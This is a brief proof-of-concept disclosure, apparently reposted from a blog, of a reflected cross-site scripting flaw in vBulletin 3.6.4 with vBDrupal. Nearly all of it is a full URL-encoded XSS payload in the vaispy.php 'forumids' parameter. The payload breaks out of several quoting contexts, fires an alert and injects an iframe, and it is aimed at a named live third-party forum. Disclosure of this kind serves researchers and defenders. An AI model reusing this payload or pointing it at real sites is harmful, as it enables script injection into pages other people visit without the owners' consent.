# Date: 6.01.2012
# Author: Sony
# Software Link: http://www.vbdrupal.org/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/vbdrupal-cross-site-scripting.html
..................................................................
I found this only in the http://forums.techarena.in. This is Vbulletin 3.6.4 with VBDrupal.
We can see xss in the /vaispy.php?do=
I replace xml with php.
GET /vaispy.php?do=xml&last=5538926&r=0.73766774241121&forumids=&noChildren=0&_=
/vaispy.php?do=xml = /vaispy.php?do=php
Resultat:
http://forums.techarena.in/vaispy.php?do=php&last=5538926&r=0.73766774241121&forumids=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/FK9D6DfRtgk%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E
Greetz : AltaiR from hackzona.ru
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.